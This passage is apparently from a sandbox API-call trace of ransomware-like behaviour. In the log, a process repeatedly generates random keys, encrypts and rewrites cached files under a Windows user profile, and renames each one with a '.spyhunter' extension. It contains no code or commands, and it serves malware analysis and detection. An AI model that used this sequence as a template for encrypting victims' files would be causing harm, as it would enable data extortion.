(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4.spyhunter")) returned 1 [0152.705] GetProcessHeap () returned 0x2c0000 [0152.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0152.705] GetProcessHeap () returned 0x2c0000 [0152.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.705] GetProcessHeap () returned 0x2c0000 [0152.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe13c0 | out: hHeap=0x2c0000) returned 1 [0152.705] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec60 | out: pbBuffer=0x270ec60) returned 1 [0152.705] GetProcessHeap () returned 0x2c0000 [0152.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.706] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec58*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec58*=0x30) returned 1 [0152.706] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0152.706] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned 151 [0152.706] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpSrch=".txt") returned 0x0 [0152.706] GetProcessHeap () returned 0x2c0000 [0152.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0152.706] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec1c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ec1c*=0x1cf, lpOverlapped=0x0) returned 1 [0152.707] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.707] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x270ec1c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ec1c*=0x1cf, lpOverlapped=0x0) returned 1 [0152.707] GetProcessHeap () returned 0x2c0000 [0152.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0152.707] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.708] WriteFile (in: hFile=0xb0, lpBuffer=0x270ec5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec1c, lpOverlapped=0x0 | out: lpBuffer=0x270ec5c*, lpNumberOfBytesWritten=0x270ec1c*=0x4, lpOverlapped=0x0) returned 1 [0152.708] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec1c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec1c*=0x30, lpOverlapped=0x0) returned 1 [0152.708] CloseHandle (hObject=0xb0) returned 1 [0152.708] GetProcessHeap () returned 0x2c0000 [0152.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0152.708] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E.spyhunter") returned 161 [0152.708] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_581c904db5924e46a6c1a8637614a40e.spyhunter")) returned 1 [0152.709] GetProcessHeap () returned 0x2c0000 [0152.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0152.709] GetProcessHeap () returned 0x2c0000 [0152.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.709] GetProcessHeap () returned 0x2c0000 [0152.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe1248 | out: hHeap=0x2c0000) returned 1 [0152.709] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec60 | out: pbBuffer=0x270ec60) returned 1 [0152.709] GetProcessHeap () returned 0x2c0000 [0152.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.709] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec58*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec58*=0x30) returned 1 [0152.709] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0152.710] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned 151 [0152.710] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpSrch=".txt") returned 0x0 [0152.710] GetProcessHeap () returned 0x2c0000 [0152.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0152.710] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec1c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ec1c*=0x1cf, lpOverlapped=0x0) returned 1 [0152.711] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.711] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x270ec1c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ec1c*=0x1cf, lpOverlapped=0x0) returned 1 [0152.711] GetProcessHeap () returned 0x2c0000 [0152.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0152.711] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.712] WriteFile (in: hFile=0xb0, lpBuffer=0x270ec5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec1c, lpOverlapped=0x0 | out: lpBuffer=0x270ec5c*, lpNumberOfBytesWritten=0x270ec1c*=0x4, lpOverlapped=0x0) returned 1 [0152.712] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec1c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec1c*=0x30, lpOverlapped=0x0) returned 1 [0152.712] CloseHandle (hObject=0xb0) returned 1 [0152.712] GetProcessHeap () returned 0x2c0000 [0152.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0152.712] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1.spyhunter") returned 161 [0152.712] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1.spyhunter")) returned 1 [0152.713] GetProcessHeap () returned 0x2c0000 [0152.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0152.713] GetProcessHeap () returned 0x2c0000 [0152.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.713] GetProcessHeap () returned 0x2c0000 [0152.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe10d0 | out: hHeap=0x2c0000) returned 1 [0152.713] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec58 | out: pbBuffer=0x270ec58) returned 1 [0152.713] GetProcessHeap () returned 0x2c0000 [0152.713] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.713] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec50*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec50*=0x30) returned 1 [0152.713] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0152.714] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned 151 [0152.714] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpSrch=".txt") returned 0x0 [0152.714] GetProcessHeap () returned 0x2c0000 [0152.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0152.714] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec14, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ec14*=0x1cf, lpOverlapped=0x0) returned 1 [0152.715] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.715] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x270ec14, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ec14*=0x1cf, lpOverlapped=0x0) returned 1 [0152.715] GetProcessHeap () returned 0x2c0000 [0152.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0152.715] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.715] WriteFile (in: hFile=0xb0, lpBuffer=0x270ec54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec14, lpOverlapped=0x0 | out: lpBuffer=0x270ec54*, lpNumberOfBytesWritten=0x270ec14*=0x4, lpOverlapped=0x0) returned 1 [0152.715] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec14, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec14*=0x30, lpOverlapped=0x0) returned 1 [0152.715] CloseHandle (hObject=0xb0) returned 1 [0152.715] GetProcessHeap () returned 0x2c0000 [0152.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0152.715] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E.spyhunter") returned 161 [0152.716] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e.spyhunter")) returned 1 [0152.716] GetProcessHeap () returned 0x2c0000 [0152.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0152.716] GetProcessHeap () returned 0x2c0000 [0152.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.716] GetProcessHeap () returned 0x2c0000 [0152.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe0f58 | out: hHeap=0x2c0000) returned 1 [0152.717] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec58 | out: pbBuffer=0x270ec58) returned 1 [0152.717] GetProcessHeap () returned 0x2c0000 [0152.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.717] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec50*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec50*=0x30) returned 1 [0152.717] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0152.727] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned 151 [0152.727] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpSrch=".txt") returned 0x0 [0152.727] GetProcessHeap () returned 0x2c0000 [0152.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0152.727] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec14, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ec14*=0x1cf, lpOverlapped=0x0) returned 1 [0152.728] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.728] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x270ec14, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ec14*=0x1cf, lpOverlapped=0x0) returned 1 [0152.728] GetProcessHeap () returned 0x2c0000 [0152.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0152.728] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.728] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec14, lpOverlapped=0x0 | out: lpBuffer=0x270ec54*, lpNumberOfBytesWritten=0x270ec14*=0x4, lpOverlapped=0x0) returned 1 [0152.728] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec14, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec14*=0x30, lpOverlapped=0x0) returned 1 [0152.729] CloseHandle (hObject=0xa0) returned 1 [0152.729] GetProcessHeap () returned 0x2c0000 [0152.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0152.729] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0.spyhunter") returned 161 [0152.729] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0.spyhunter")) returned 1 [0152.836] GetProcessHeap () returned 0x2c0000 [0152.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0152.836] GetProcessHeap () returned 0x2c0000 [0152.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.836] GetProcessHeap () returned 0x2c0000 [0152.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe0de0 | out: hHeap=0x2c0000) returned 1 [0152.836] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec50 | out: pbBuffer=0x270ec50) returned 1 [0152.836] GetProcessHeap () returned 0x2c0000 [0152.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.836] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec48*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec48*=0x30) returned 1 [0152.836] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0152.837] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned 151 [0152.837] StrStrW (lpFirst="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", lpSrch=".txt") returned 0x0 [0152.837] GetProcessHeap () returned 0x2c0000 [0152.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0152.837] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec0c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ec0c*=0x1d7, lpOverlapped=0x0) returned 1 [0152.838] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffe29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.838] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1d7, lpNumberOfBytesWritten=0x270ec0c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ec0c*=0x1d7, lpOverlapped=0x0) returned 1 [0152.838] GetProcessHeap () returned 0x2c0000 [0152.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0152.838] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.838] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec0c, lpOverlapped=0x0 | out: lpBuffer=0x270ec4c*, lpNumberOfBytesWritten=0x270ec0c*=0x4, lpOverlapped=0x0) returned 1 [0152.838] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec0c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec0c*=0x30, lpOverlapped=0x0) returned 1 [0152.839] CloseHandle (hObject=0xa0) returned 1 [0152.839] GetProcessHeap () returned 0x2c0000 [0152.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0152.839] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6.spyhunter") returned 161 [0152.839] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6.spyhunter")) returned 1 [0152.839] GetProcessHeap () returned 0x2c0000 [0152.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0152.840] GetProcessHeap () returned 0x2c0000 [0152.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 